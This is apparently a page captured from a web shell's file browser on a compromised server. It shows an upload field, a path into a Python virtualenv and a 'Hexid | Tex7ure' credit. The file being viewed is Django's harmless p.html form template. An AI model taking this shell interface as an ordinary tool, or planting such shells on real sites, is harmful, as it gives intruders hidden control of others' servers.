/
home
/
report
/
report
/
venv
/
lib64
/
python3.8
/
site-packages
/
django
/
forms
/
templates
/
django
/
forms
/
File Upload :
llllll
Current File: //home/report/report/venv/lib64/python3.8/site-packages/django/forms/templates/django/forms/p.html
{{ errors }} {% if errors and not fields %} <p>{% for field in hidden_fields %}{{ field }}{% endfor %}</p> {% endif %} {% for field, errors in fields %} {{ errors }} <p{% with classes=field.css_classes %}{% if classes %} class="{{ classes }}"{% endif %}{% endwith %}> {% if field.label %}{{ field.label_tag }}{% endif %} {{ field }} {% if field.help_text %} <span class="helptext">{{ field.help_text|safe }}</span> {% endif %} {% if forloop.last %} {% for field in hidden_fields %}{{ field }}{% endfor %} {% endif %} </p> {% endfor %} {% if not fields and not errors %} {% for field in hidden_fields %}{{ field }}{% endfor %} {% endif %}
Copyright ©2k19 -
Hexid
|
Tex7ure